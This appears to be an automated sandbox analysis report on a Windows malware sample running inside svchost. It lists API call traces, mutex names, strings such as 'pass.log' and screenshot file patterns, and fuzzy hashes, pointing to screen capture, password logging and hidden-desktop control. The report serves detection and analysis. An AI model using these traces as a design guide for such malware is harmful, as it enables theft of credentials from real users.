PathMakeSystemFolderA.SHLWAPI(?), ref: 02C919ED
SetLastError.KERNEL32(00000000), ref: 02C919F4
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91A23
GetLastError.KERNEL32 ref: 02C91A29
IsUserAnAdmin.SHELL32 ref: 02C91A2D
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C91A3E
SetLastError.KERNEL32(00000000), ref: 02C91A45
_snprintf.MSVCRT ref: 02C91A7A
Sleep.KERNEL32(00000FA0,?), ref: 02C91A90

Strings

scrs, xrefs: 02C91A09
%s\%02d.bmp, xrefs: 02C91A69
82c31d1a, xrefs: 02C91985, 02C91990

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
String ID: %s\%02d.bmp$82c31d1a$scrs
API String ID: 224938940-3428871440
Opcode ID: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
Instruction ID: 97337809144342f5afb747c78701df50d7f1a3d8e6f0a197024a797b0774a99a
Opcode Fuzzy Hash: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
Instruction Fuzzy Hash: 34313571E402995FCB21DB34AC5DBEB7BA8AF85300F0946D4E989C3100DFB0DA58CBA0

Function 00401A30 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 103memoryfilelibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004010A0: CreateFileA.KERNEL32('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
Part of subcall function 004010A0: GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
Part of subcall function 004010A0: HeapAlloc.KERNEL32(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
Part of subcall function 004010A0: memset.MSVCRT ref: 00401114
Part of subcall function 004010A0: ReadFile.KERNEL32(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
Part of subcall function 004010A0: HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
Part of subcall function 004010A0: HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
Part of subcall function 004010A0: GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
Part of subcall function 004010A0: CloseHandle.KERNEL32(00000000,?,00401A54,00000000,00000000), ref: 00401184
Part of subcall function 004010A0: IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194

RtlImageNtHeader.NTDLL(00000000), ref: 00401A5F
GetTickCount.KERNEL32 ref: 00401A77
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401A88
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401A98
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401ADC
WriteFile.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401AF9
SetEndOfFile.KERNEL32(00000000), ref: 00401B04
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B1A
CloseHandle.KERNEL32(00000000), ref: 00401B2B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B3A
HeapValidate.KERNEL32(00000000), ref: 00401B3D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B4A
HeapFree.KERNEL32(00000000), ref: 00401B4D

Strings

'+@, xrefs: 00401A36
ntdll.dll, xrefs: 00401A83
RtlUniform, xrefs: 00401A92

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$HandleProcess$CloseCreateFreeInformationValidateWrite$AddressAllocCountHeaderImageModuleProcReadSizeTickmemset
String ID: '+@$RtlUniform$ntdll.dll
API String ID: 3626882417-2605303930
Opcode ID: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
Instruction ID: 5333274c7b5ae32bd68dbaed39568bfcb3f6f97b50696231050ce748e7cb221e
Opcode Fuzzy Hash: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
Instruction Fuzzy Hash: 083181B1601304ABE710AB75DD49F5B3AACAB84755F458136FF05F72E0EB78D9008AA8

Function 02C90AF0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
CloseHandle.KERNEL32(00000000), ref: 02C90B4F
CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
Sleep.KERNEL32(00009C40), ref: 02C90B75
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
CloseHandle.KERNEL32(00000000), ref: 02C90B9C
PathAddBackslashA.SHLWAPI(82c31c07), ref: 02C90BA7
Sleep.KERNEL32(00009C40,82c31c07,RAIFF), ref: 02C90BC1
Sleep.KERNEL32(00000064), ref: 02C90BCA

Strings

82c31c07, xrefs: 02C90BA2, 02C90BB2
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C90B10
RAIFF, xrefs: 02C90BAD
P0#v, xrefs: 02C90B2D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: 82c31c07$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RAIFF
API String ID: 505831200-3163959839
Opcode ID: 359c752f12f6c967435cf34ed389b4ebcc13ba95406090ce099f1244c96a91b4
Instruction ID: e6b70bb27d61c34d8a9be23afc102e9d7ab718ba819a6fa34f7ce02b850e8a58
Opcode Fuzzy Hash: 359c752f12f6c967435cf34ed389b4ebcc13ba95406090ce099f1244c96a91b4
Instruction Fuzzy Hash: AE11B630AC9755BAF7126B658C1EF1E37DC5F44B19F104654F551A30C1EBF0E9008AAA

Function 02C91AB0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
CloseHandle.KERNEL32(00000000), ref: 02C91B0F
CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
Sleep.KERNEL32(00009C40), ref: 02C91B35
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
CloseHandle.KERNEL32(00000000), ref: 02C91B5C
PathAddBackslashA.SHLWAPI(82c31d1a), ref: 02C91B67
Sleep.KERNEL32(00009C40,82c31d1a,RSTYLE), ref: 02C91B81
Sleep.KERNEL32(00000064), ref: 02C91B8A

Strings

82c31d1a, xrefs: 02C91B62, 02C91B72
RSTYLE, xrefs: 02C91B6D
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02C91AD0
P0#v, xrefs: 02C91AED

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: 82c31d1a$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$RSTYLE
API String ID: 505831200-163837639
Opcode ID: e7272ec0258fa3e64e587906a230ea33347638888357daea2d824eb37b8710e6
Instruction ID: b08893210dbc9ebcc0b73e871e23fbd590f2a43a74c877046b024da61a8c4ed2
Opcode Fuzzy Hash: e7272ec0258fa3e64e587906a230ea33347638888357daea2d824eb37b8710e6
Instruction Fuzzy Hash: 7C11E630AC47537BF6126B658C0FF1A369C9F81B64F184654F919620C1EBF4A9008A7B

Function 02C84010 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 210stringCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C84060
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8408C
VirtualQuery.KERNEL32(02C93910,0000001C,0000001C), ref: 02C840B3
IsBadReadPtr.KERNEL32(?,00000005), ref: 02C840E4
strstr.MSVCRT ref: 02C8410D
StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02C84125
StrToIntA.SHLWAPI(-00000010), ref: 02C84133
memcpy.MSVCRT(00000000,?,00000004), ref: 02C84165

Strings

Content-Length: , xrefs: 02C8411F
, xrefs: 02C84107
POST, xrefs: 02C840EE

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$Readmemcpystrstr
String ID: $Content-Length: $POST
API String ID: 2509092961-2076583852
Opcode ID: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
Instruction ID: 20fb5f77d205ca073ff0fd67f8c3b62ce2f308a28ed9b6ee4e61b5401f3d3b17
Opcode Fuzzy Hash: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
Instruction Fuzzy Hash: C6718071D40256AFDB24EFA8DC84BAEBBB9FF88704F108669E814E7640D7309914CF91

Function 02C8CBC0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 167stringthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C8CBE1
StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8CC4D
PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8CC83
PathFileExistsA.SHLWAPI(00000000,82C3184B), ref: 02C8CCC9
CreateThread.KERNEL32(00000000,00000000,02C8A390,00000000,00000000,00000000), ref: 02C8CD48
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8CD60
CloseHandle.KERNEL32(00000000), ref: 02C8CD71
strstr.MSVCRT ref: 02C8CD97
memcpy.MSVCRT(00000000,00000000,02C87A4D), ref: 02C8CDD4

Strings

<L>, xrefs: 02C8CC13
bsi.dll, xrefs: 02C8CD91
82C3184B, xrefs: 02C8CC48, 02C8CC4F, 02C8CC7C, 02C8CC85
pass.log, xrefs: 02C8CCA8
POST, xrefs: 02C8CD83

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
String ID: 82C3184B$<L>$POST$bsi.dll$pass.log
API String ID: 4177962767-2622770412
Opcode ID: 2a9d3f0de192a04b5262e6f3fb27019717aec26fc3c489003c4e6fc2897fdf56
Instruction ID: 06d8eef77a4d09b74bfb68f91aa851fec4f1dbc0fe938ed8cc18d0de3af1fdc7
Opcode Fuzzy Hash: 2a9d3f0de192a04b5262e6f3fb27019717aec26fc3c489003c4e6fc2897fdf56
Instruction Fuzzy Hash: AC516F31D406455BD716BF34EC097E67BA9EF85308F14865BD80897280EB709B58CFE0

Function 02C8B888 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8B8A7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
GetLastError.KERNEL32 ref: 02C8B8EB
IsUserAnAdmin.SHELL32 ref: 02C8B8F3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
SetLastError.KERNEL32(00000000), ref: 02C8B90B
GetFileAttributesA.KERNEL32(?), ref: 02C8B941
SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
PathAddBackslashA.SHLWAPI(82C3184B,?,?), ref: 02C8B9C7

Strings

path_ctunnel.txt, xrefs: 02C8BA08
82C3184B, xrefs: 02C8B8A2, 02C8B8A9, 02C8B9C2, 02C8B9C9
\, xrefs: 02C8B95F
ctunnel.zip, xrefs: 02C8B920

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
String ID: 82C3184B$\$ctunnel.zip$path_ctunnel.txt
API String ID: 2545201083-3024699672
Opcode ID: 597e81aea07d56e163b133f732db12b9ba6d08a01c7eba91b56a39189bb5b505
Instruction ID: d0a2208008877b16d15c25a98c7cfc1f1bfd6b29ceef1f59d470caa040ab772e
Opcode Fuzzy Hash: 597e81aea07d56e163b133f732db12b9ba6d08a01c7eba91b56a39189bb5b505
Instruction Fuzzy Hash: 8A51F6309046598FDB16DF24A858BE6BBF9EF86308F14C6D4D8C9D7211DB70DA89CB90

Function 02C783D0 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 84windowsynchronizationsleepCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?), ref: 02C783E2

Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C77FCA
Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FD9
Part of subcall function 02C77FB0: DeleteDC.GDI32(00000000), ref: 02C77FE7
Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C77FF7
Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FFF
Part of subcall function 02C77FB0: DeleteDC.GDI32(?), ref: 02C78008
Part of subcall function 02C77FB0: GetDC.USER32(00000000), ref: 02C7800C
Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C7801B
Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C78023
Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C78044
Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C78053
Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C7806E
Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C7808D
Part of subcall function 02C77FB0: ReleaseDC.USER32(00000000,00000000), ref: 02C7809C

WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02C7840C
GetTopWindow.USER32(00000000), ref: 02C7841B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78432
GetWindow.USER32(00000000,00000005), ref: 02C78448
GetWindow.USER32(00000000), ref: 02C7844B
WindowFromPoint.USER32(?,?,00000000), ref: 02C7845F
SendMessageA.USER32(00000000,?,00000005,00000000), ref: 02C78481
GetIconInfo.USER32(?,?), ref: 02C7848D
DrawIcon.USER32(00000000,00000000,?,?), ref: 02C784AE
DestroyIcon.USER32(?,?,?,00000000), ref: 02C784B5
ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 02C784C2
SetEvent.KERNEL32(00000000,?,?,00000000), ref: 02C784CF
Sleep.KERNEL32(00000032), ref: 02C784DB

Strings

P0#v, xrefs: 02C784C2

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreateDeleteSelectWindow$Icon$BitmapReleaseSingleWait$DesktopDestroyDrawEventFromInfoMessageMutexPointSendSleepThread
String ID: P0#v
API String ID: 2294845507-3387790918
Opcode ID: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
Instruction ID: 0e43117837ab6268a9a67490fb1ba952dea540b34f6c08637e1ff143d0f09b8b
Opcode Fuzzy Hash: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
Instruction Fuzzy Hash: 2A313674A80341AFC616EBB4EC8DF1B7769EB88711F008F98F61587280DA74E921CB60

Function 02C91AC8 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
CloseHandle.KERNEL32(00000000), ref: 02C91B0F
CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
Sleep.KERNEL32(00009C40), ref: 02C91B35
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
CloseHandle.KERNEL32(00000000), ref: 02C91B5C
PathAddBackslashA.SHLWAPI(82c31d1a), ref: 02C91B67
Sleep.KERNEL32(00009C40,82c31d1a,RSTYLE), ref: 02C91B81
Sleep.KERNEL32(00000064), ref: 02C91B8A

Strings

82c31d1a, xrefs: 02C91B62, 02C91B72
RSTYLE, xrefs: 02C91B6D
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02C91AD0
P0#v, xrefs: 02C91AED

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: 82c31d1a$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$RSTYLE
API String ID: 505831200-163837639
Opcode ID: 80d8b0e3d9d2c3c3ea5e89fe1e9f890111a42fa3a035df82bacbb4d223c8714e
Instruction ID: 87246e837453476ab8cb3a90fcf2ea0ea17a32e8c0ab618fc1457228210fe869
Opcode Fuzzy Hash: 80d8b0e3d9d2c3c3ea5e89fe1e9f890111a42fa3a035df82bacbb4d223c8714e
Instruction Fuzzy Hash: 0711E530AC47537BF7226B648C1FF1E37886F81B29F088644F919620C1EBF485008B67

Function 02C90B08 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
CloseHandle.KERNEL32(00000000), ref: 02C90B4F
CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
Sleep.KERNEL32(00009C40), ref: 02C90B75
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
CloseHandle.KERNEL32(00000000), ref: 02C90B9C
PathAddBackslashA.SHLWAPI(82c31c07), ref: 02C90BA7
Sleep.KERNEL32(00009C40,82c31c07,RAIFF), ref: 02C90BC1
Sleep.KERNEL32(00000064), ref: 02C90BCA

Strings

82c31c07, xrefs: 02C90BA2, 02C90BB2
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C90B10
RAIFF, xrefs: 02C90BAD
P0#v, xrefs: 02C90B2D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: 82c31c07$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RAIFF
API String ID: 505831200-3163959839
Opcode ID: a3da883863b471566ec0b6c46283cfe668284258ce6a3e6ebab2f37f918e3cc1
Instruction ID: 1bfc5cdfe3475c5b9873aec1f5fa2bb2d161855bd81734d9005c03239ff8d8f9
Opcode Fuzzy Hash: a3da883863b471566ec0b6c46283cfe668284258ce6a3e6ebab2f37f918e3cc1
Instruction Fuzzy Hash: 7811E530AC5752BEFB225B648C1FF1E37C86F80B19F108654F955A20C1EBB0D5008B67

Function 02C792B0 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON

Download Yara Rule

APIs

GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02C792BE

Part of subcall function 02C7D200: GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
Part of subcall function 02C7D200: GetLastActivePopup.USER32(?), ref: 02C7D229
Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000005), ref: 02C7D243
Part of subcall function 02C7D200: GetWindow.USER32(00000000), ref: 02C7D246
Part of subcall function 02C7D200: GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000004), ref: 02C7D265
Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000003), ref: 02C7D29E

SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02C792FF
GetAncestor.USER32(00000000,00000002,00000000), ref: 02C79385
SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02C793AC
PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02C793F1
PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02C79445

Part of subcall function 02C79160: GetTickCount.KERNEL32 ref: 02C791EA
Part of subcall function 02C79160: GetClassLongA.USER32(00000000,000000E6), ref: 02C7923D

PostMessageA.USER32(00000000,00000112,?,?), ref: 02C794AE
PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02C794D9
PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02C79555
GetSystemMenu.USER32(00000000,00000000), ref: 02C79574
GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02C79598
GetWindowThreadProcessId.USER32(?,00000000), ref: 02C79603
PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02C79616
PostMessageA.USER32(?,?,00000001,00000000), ref: 02C79639
PostMessageA.USER32(?,?,00000002,00000000), ref: 02C7965B
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79693
GetWindowThreadProcessId.USER32(?,00000000), ref: 02C796BD

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
String ID:
API String ID: 590198697-0
Opcode ID: 109e73a09647cd5770d935d94549e2aa3c30c96d773e79d3f322b559c98ccc02
Instruction ID: 28f0c27428ceba17d6f8045eb40a16bd936f8f5dabe40bbc738a6dc2b58ad52d
Opcode Fuzzy Hash: 109e73a09647cd5770d935d94549e2aa3c30c96d773e79d3f322b559c98ccc02
Instruction Fuzzy Hash: 80B15832F402146AEB219A69DC89FBF7B68E7C2714F00463AFD05971C1C7798A51DBA1

Function 00401D80 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76D6DB30), ref: 00401DA6
NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76D6DB30), ref: 00401DC2
_snprintf.MSVCRT ref: 00401E08
NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401E19
NetApiBufferFree.NETAPI32(?), ref: 00401E3A
NetApiBufferFree.NETAPI32(?), ref: 00401E45

Part of subcall function 004017F0: memset.MSVCRT ref: 0040181B
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75C25430,00000000,?), ref: 00401833
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 00401860
Part of subcall function 004017F0: memset.MSVCRT ref: 00401873
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 004018CD
Part of subcall function 004017F0: memset.MSVCRT ref: 004018DD

Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 0040193A
Part of subcall function 004017F0: memset.MSVCRT ref: 0040194A
Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
Part of subcall function 004017F0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019B6
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
